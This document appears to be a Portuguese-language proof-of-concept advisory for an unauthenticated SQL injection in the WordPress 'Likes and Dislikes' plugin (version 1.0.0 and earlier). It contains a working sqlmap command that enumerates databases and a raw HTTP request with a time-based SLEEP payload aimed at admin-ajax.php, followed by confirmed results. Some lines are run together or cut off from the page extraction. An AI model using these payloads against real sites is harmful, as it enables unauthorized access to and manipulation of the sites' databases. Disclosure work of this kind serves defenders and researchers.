
O plugin WordPress Likes and Dislikes <= 1.0.0 é vulnerável a SQL Injection.
Descoberto por: Khaled_Alenazi (Nxploited) Publicado em: 27 de Maio de 2025
O Plugin Likes and Dislikes para WordPress é vulnerável a Injeção SQL através do parâmetro post em todas as versões até e incluindo 1.0.0.
Devido à escapação insuficiente e à falta de prepared statements, atacantes não autenticados podem injectar SQL bruto nas consultas do backend, levando a vazamento ou manipulação de dados.
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
Este comando confirma o ponto de injeção e enumera as bases de dados usando uma técnica baseada em tempo.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
cego baseado em booleano e cego baseado em tempo.
- Confirmou que o backend é MySQL.
- Bases de dados enumeradas: db, test, information_schema. 
15 segundos, indicando injeção verdadeira. 
post.Este conteúdo é fornecido apenas para fins educacionais e de pesquisa. O autor não aprova atividades maliciosas ou exploração de sistemas sem autorização explícita.
Khaled_Alenazi (Nxploited)